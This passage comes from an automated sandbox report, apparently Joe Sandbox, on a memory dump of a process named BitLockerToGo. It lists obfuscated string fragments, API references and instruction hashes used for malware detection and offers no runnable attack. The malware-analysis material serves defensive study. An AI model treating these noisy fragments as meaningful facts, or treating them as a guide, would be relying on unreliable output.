• String ID: O*A$$[.]$'C$E$'G1Y$0_!Q$1K-M$D3C5$E{G}$F7UI$kW1i
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $TG2$%*+($&PiD$/T,^$2LA3$cK_+$cLEC$hk$wj11${u
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 'LB$:B$CRB$UPB$nMB$xKB$xKB$JB$JB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: m''$#,C$*&?$$7()&$VB<2$jzz$mYZ$Ncq
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                                                          • API String ID: 0-2517803157
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 0s+q$c/g-$c3g1$d7`5$k;f9$k?y=$x+|)$WU
• API String ID: 0-2378892908
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ()$/.M$QW$Vn$Ym$ez$g$u|
• API String ID: 0-1058671686
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %*+($;G=E$D$Jsrq$MOnM$Y#Q!$_+])$tScQ
• API String ID: 0-1576646981
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %$%$($($*$*$+$+
• API String ID: 0-157184678
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %$%$($($*$*$+$+
• API String ID: 0-157184678
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: %$%$($($*$*$+$+
• API String ID: 2994545307-157184678
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: %$%$($($*$*$+$+
• API String ID: 2994545307-157184678
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %*+($%*+($QU$VF$be$IG$MK
• API String ID: 0-1960574425
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %*+($FKYW$dB$ftg~$B$B
• API String ID: 0-494304196
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: /.-,$88&$88&$>8&$>8&$P
• API String ID: 0-229866786
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 0$0$0$@$i
• API String ID: 0-3124195287
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
• API String ID: 0-1123320326
                                                                                                                                                          • Opcode ID: 99df6b61dc9cf932a60c5397529fefe357d78dcf3fa2eb2f1b9697ebcf686894
                                                                                                                                                          • Instruction ID: 8d150dfe86a620273aa876613df8e89353f7c8c64259da64b0f6564091b39426
                                                                                                                                                          • Opcode Fuzzy Hash: 99df6b61dc9cf932a60c5397529fefe357d78dcf3fa2eb2f1b9697ebcf686894
                                                                                                                                                          • Instruction Fuzzy Hash: CD02A27060C3918FC718CF29C49425BFBE2AFD9304F18896EE4D9A7392D239D945CB96
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                          • API String ID: 0-3620105454
                                                                                                                                                          • Opcode ID: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
                                                                                                                                                          • Instruction ID: 482bdeca682f86fd8ddd8e77cf8281ea062763dfda21032ba3aa26e56a1ed631
                                                                                                                                                          • Opcode Fuzzy Hash: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
                                                                                                                                                          • Instruction Fuzzy Hash: DCD1B17060D3918FC715CF29C48065AFFE1AFD9304F188A6EE4D997392D238D909CB96
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,$/.-,$88&$88&$88&
                                                                                                                                                          • API String ID: 2994545307-3163543823
                                                                                                                                                          • Opcode ID: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
                                                                                                                                                          • Instruction ID: 3f361f2711ddfdc0f3908fbca8bf341888ca3b725b25a747bded349d3e26c404
                                                                                                                                                          • Opcode Fuzzy Hash: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
                                                                                                                                                          • Instruction Fuzzy Hash: 60A14B32A04351ABF724DF54DC81BABB7D1EFC5709F14892EE688D7381E73899018796
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$rTD$WD
                                                                                                                                                          • API String ID: 0-1447521219
                                                                                                                                                          • Opcode ID: d274aa0dd75284b3dc8c770fe66cb4b3dcf621b6fe640311d105ab0291ab6262
                                                                                                                                                          • Instruction ID: 514f13634d9d390dc9dfcddb367d916e8938e7c246aef56a26b897fe237e3f6f
                                                                                                                                                          • Opcode Fuzzy Hash: d274aa0dd75284b3dc8c770fe66cb4b3dcf621b6fe640311d105ab0291ab6262
                                                                                                                                                          • Instruction Fuzzy Hash: E742F035A59301CFD708CF28E89026AB3E1FB8A315F09897EE58687762D735EC45CB45
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: *XJ{$>T\Z$])$aff{
                                                                                                                                                          • API String ID: 0-2222276473
                                                                                                                                                          • Opcode ID: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
                                                                                                                                                          • Instruction ID: 208e91640e2c0379ccfad83609a9321a0cf82edc80dee516d183bf74cf9772c2
                                                                                                                                                          • Opcode Fuzzy Hash: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
                                                                                                                                                          • Instruction Fuzzy Hash: B352E270604B818FD725CF35C4907A3BBE1AF57354F189A5EC0EA8B792C778A40ACB65
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DrivesLogical
                                                                                                                                                          • String ID: P_$x{
                                                                                                                                                          • API String ID: 999431828-1915392596
                                                                                                                                                          • Opcode ID: 0f78e3c788b37d7698a2c418f735874c4554113e012fd32b90fcf422649e7e0e
                                                                                                                                                          • Instruction ID: 28550b524e20fd6019708488fec728c1a1e00781098e71f607dd82103f106617
                                                                                                                                                          • Opcode Fuzzy Hash: 0f78e3c788b37d7698a2c418f735874c4554113e012fd32b90fcf422649e7e0e
                                                                                                                                                          • Instruction Fuzzy Hash: 5202B9B46083408FE3109F25D89276FBBE1EF92314F50892DF4D58B3A5D779880ACB96
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$rTD$WD
                                                                                                                                                          • API String ID: 0-1447521219
                                                                                                                                                          • Opcode ID: d42dc95c6450376a90c4fb5beb59cb56e2ee08a1461ea882bd9582f7a6b49ef5
                                                                                                                                                          • Instruction ID: 4edd658ed11fb6b0a462d7d70b0944146771da76dc5a671dfe6337bc9ceae043
                                                                                                                                                          • Opcode Fuzzy Hash: d42dc95c6450376a90c4fb5beb59cb56e2ee08a1461ea882bd9582f7a6b49ef5
                                                                                                                                                          • Instruction Fuzzy Hash: 7432FE35A59301CFC708CF28E89026AB7E2FB8A315F09897DD58687762D734E845CB85
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: V24"$_jlm$g^\\$gav`
                                                                                                                                                          • API String ID: 0-168531910
                                                                                                                                                          • Opcode ID: 7efd46db49a120c4ec6a0f4fd16e04d42ff24d1528cdc7f0a015b8535ce3eacf
                                                                                                                                                          • Instruction ID: 62e1cc47b6546c04e873f0fa59edd9078f3fb9312850b668d426b2bb13264185
                                                                                                                                                          • Opcode Fuzzy Hash: 7efd46db49a120c4ec6a0f4fd16e04d42ff24d1528cdc7f0a015b8535ce3eacf
                                                                                                                                                          • Instruction Fuzzy Hash: 00121975604B818FD72ACF35C5517A3BBE2AF97304F0899AEC0EB8B382C77965058B15
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Q@g`$7#v
                                                                                                                                                          • API String ID: 0-593499481
                                                                                                                                                          • Opcode ID: 3ab620c9d14432ba8d622c46299225c9c361d89d5f9fde95cc5cbf9eaacbad13
                                                                                                                                                          • Instruction ID: eae350f86fd92dff23fe4261f9e26cd0abfbdae7ba8eea48a10bab641a56ca95
                                                                                                                                                          • Opcode Fuzzy Hash: 3ab620c9d14432ba8d622c46299225c9c361d89d5f9fde95cc5cbf9eaacbad13
                                                                                                                                                          • Instruction Fuzzy Hash: 8C51E1B4508344EFE3209F26E84971BBBE0FB85704F54096CF1849B2A2DB75C915CB9B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: C4C798787793A87B05133B3AEA4D70B5$D$T$pq
                                                                                                                                                          • API String ID: 0-1022955868
                                                                                                                                                          • Opcode ID: 01be8b5697bc29943e35b2126dbe9babd9bd8b49c44cda6edb2dd2f02762c4ad
                                                                                                                                                          • Instruction ID: 517c0696a7e9e4e5b8c99c4f33dfe11682e2c86f1bfa69376ea61f303c213b19
                                                                                                                                                          • Opcode Fuzzy Hash: 01be8b5697bc29943e35b2126dbe9babd9bd8b49c44cda6edb2dd2f02762c4ad
                                                                                                                                                          • Instruction Fuzzy Hash: 0EC1DDB16083809FE710DF65D88175BBBE2EBC1318F14892DE1C45B396DA79C90ACB97
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$WD
                                                                                                                                                          • API String ID: 0-3205647164
                                                                                                                                                          • Opcode ID: 8b7cc2a2e53bcceb4c2a3eb9a7888184378234fdb424fe3499ae0582bde59b9a
                                                                                                                                                          • Instruction ID: 0696c2488c5ca6b57e4adc92f154419c249bd2d34664475ee3d6fea8f40925b7
                                                                                                                                                          • Opcode Fuzzy Hash: 8b7cc2a2e53bcceb4c2a3eb9a7888184378234fdb424fe3499ae0582bde59b9a
                                                                                                                                                          • Instruction Fuzzy Hash: D8221235A58301CFC708CF28E89026AB7E1FB8A315F0A897DE58697762D735ED05CB85
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • Instruction ID: 320c5f61f4139a4da77a7abd9e0d8e8ce1e0a717e261a1249956ac20178eb22d
                                                                                                                                                          • Opcode Fuzzy Hash: 3f032653eb93f59891cd92d2f9cf8b43ba3dd62741e93288b22a5db652d260b8
                                                                                                                                                          • Instruction Fuzzy Hash: CC81373761DE908BD3258A3C4C1137A6A830B97334F3D976BD5F28B3E5DA5D8802934A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (+$P7T)
                                                                                                                                                          • API String ID: 0-1314400319
                                                                                                                                                          • Opcode ID: 3f948aaabf7ed0ed0e5774d3e8465603282334fbe704faae138d4129b6d227aa
                                                                                                                                                          • Instruction ID: ac2a0be1deea4b4189643ed0b490d0cde92cb019fbb32b854c621064ada46b43
                                                                                                                                                          • Opcode Fuzzy Hash: 3f948aaabf7ed0ed0e5774d3e8465603282334fbe704faae138d4129b6d227aa
                                                                                                                                                          • Instruction Fuzzy Hash: A661DD716083618BC714CF15E89176BB7E0EF82764F089E1DE8D65B391E3788944CB9A
                                                                                                                                                          Strings
                                                                                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00436C2B
                                                                                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00436BA7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                                          • API String ID: 0-2492670020
                                                                                                                                                          • Opcode ID: 8baa32632ae9f8ef22204c4e52aa16c5b2e302a7226f16d59012fb38d860b74d
                                                                                                                                                          • Instruction ID: e59b288758b9919105dd4668c197a6f2b507243c8d739cfa7a834970def23930
                                                                                                                                                          • Opcode Fuzzy Hash: 8baa32632ae9f8ef22204c4e52aa16c5b2e302a7226f16d59012fb38d860b74d
                                                                                                                                                          • Instruction Fuzzy Hash: 1A613B3664959257D318893C4C212BAAA538B97334F3EE36FE5F28B3E0D55D8802921A
                                                                                                                                                          Strings
                                                                                                                                                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00436E15, 00436F12
                                                                                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00436DD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                                          • API String ID: 0-2492670020
                                                                                                                                                          • Opcode ID: 7b65f3be6fd35c8e80eb7173b7b53a6dd50b925ad49a31363b71411c5f62ed77
                                                                                                                                                          • Instruction ID: fa010391967b301aa64a0dc60cb5df617edfad0297d8a6c6fe60ece4a3747872
                                                                                                                                                          • Opcode Fuzzy Hash: 7b65f3be6fd35c8e80eb7173b7b53a6dd50b925ad49a31363b71411c5f62ed77
                                                                                                                                                          • Instruction Fuzzy Hash: 03615B3761959297C7104E3C9C422A9AA530B9B334F3ED377D8B18B3D1C66E4C0A9356
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0$T
                                                                                                                                                          • API String ID: 0-1187268809
                                                                                                                                                          • Opcode ID: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
                                                                                                                                                          • Instruction ID: 6b4e5559f047ebe892616e64a95d5d31df2fd22d4af3a3957066fdf53f8f1aff
                                                                                                                                                          • Opcode Fuzzy Hash: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
                                                                                                                                                          • Instruction Fuzzy Hash: 74719FB16043009FE718CF14C851B6BFBE1EF85314F24882DEA958B351C779E855CB96
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($D
                                                                                                                                                          • API String ID: 0-2900777419
                                                                                                                                                          • Opcode ID: 269a632ffe76f496ff796a3ed179a9758fc2955de7d4d28485244eb6707e22f2
                                                                                                                                                          • Instruction ID: 7d4d99b430d3557b421910b4f1faef55ee4365ca1ce7d7efc57e0254bf4380e2
                                                                                                                                                          • Opcode Fuzzy Hash: 269a632ffe76f496ff796a3ed179a9758fc2955de7d4d28485244eb6707e22f2
                                                                                                                                                          • Instruction Fuzzy Hash: 7361F6B4108300DFD718CF14D895B6BB7A1FF85759F10592DE4821B2A3D37ADA4ACB8A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,$@
                                                                                                                                                          • API String ID: 2994545307-3723685748
                                                                                                                                                          • Opcode ID: db665a82bba1296d39a868ee5f520c1422103deeff47c98896bc777b14cb1610
                                                                                                                                                          • Instruction ID: fcae81e8805a0631e12ceff5e77ca36e2fde201330cec111e8e81ca44fce2a30
                                                                                                                                                          • Opcode Fuzzy Hash: db665a82bba1296d39a868ee5f520c1422103deeff47c98896bc777b14cb1610
                                                                                                                                                          • Instruction Fuzzy Hash: D54149709043109BEB04CF18E88566BB7F0FF95728F11862DE599573A5E7399A04CB8B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %1.17g
                                                                                                                                                          • API String ID: 0-1551345525
                                                                                                                                                          • Opcode ID: c1da595488c2fa9b36147d3a0c3c686ea93c5f2225409572b266d64f1e683121
                                                                                                                                                          • Instruction ID: 8cedfe368efb2444d6467586d7d48e8a1f5c8dd3b15ce253f9faee3126b86410
                                                                                                                                                          • Opcode Fuzzy Hash: c1da595488c2fa9b36147d3a0c3c686ea93c5f2225409572b266d64f1e683121
                                                                                                                                                          • Instruction Fuzzy Hash: 6112C475A08B418BD7158E14948032BBB92EFE1308F18857ED895AB3C1E7B9DC45CF4A
                                                                                                                                                          APIs
                                                                                                                                                          • CoCreateInstance.OLE32(00449B90,00000000,00000001,00449B80), ref: 00427379
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                          • Opcode ID: 520afe2f893935785e5c665e40ede723d4ec9078aaab423c0093ae211694db98
                                                                                                                                                          • Instruction ID: 08bc5e63f182cba07979323364d8c3633ea9ecc8f17316bb81642fd87fb76cd1
                                                                                                                                                          • Opcode Fuzzy Hash: 520afe2f893935785e5c665e40ede723d4ec9078aaab423c0093ae211694db98
                                                                                                                                                          • Instruction Fuzzy Hash: 7B51DFB0708220ABDB20AB24DC96B7777A4EF81758F448559F985CB391F378E841C76A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "
                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                          • Opcode ID: d568b379d4c6fa6f77ff1eae736f1047f5612009a18c4700c5e623800c826368
                                                                                                                                                          • Instruction ID: a3c58f450455d4d1eb0a87c26812bbd6c04f9869e4a084bcfb263ebe4809eb3b
                                                                                                                                                          • Opcode Fuzzy Hash: d568b379d4c6fa6f77ff1eae736f1047f5612009a18c4700c5e623800c826368
                                                                                                                                                          • Instruction Fuzzy Hash: B4D125B2B082256BC724CE25D490B6BB7F5AB84354FC8853EE88687391D73CDC49C786
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 2994545307-3233224373
                                                                                                                                                          • Opcode ID: 980dc8a21c4e044f79a4081f9898d7856cb0dea31180dea976573b739579e97f
                                                                                                                                                          • Instruction ID: 7ea25cf2304ee25f65172b355e02d3d3047475b1fd223099b041827ac72acce6
                                                                                                                                                          • Opcode Fuzzy Hash: 980dc8a21c4e044f79a4081f9898d7856cb0dea31180dea976573b739579e97f
                                                                                                                                                          • Instruction Fuzzy Hash: 79A14770B083258BD7109F25E88073BB3E5EF81354F58892EE9859B382E738D945C7DA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+(
                                                                                                                                                          • API String ID: 0-3233224373
                                                                                                                                                          • Opcode ID: a8918c15477656cc8daef73c3f3a0404579f49981537884bf10d2b6879b085a5
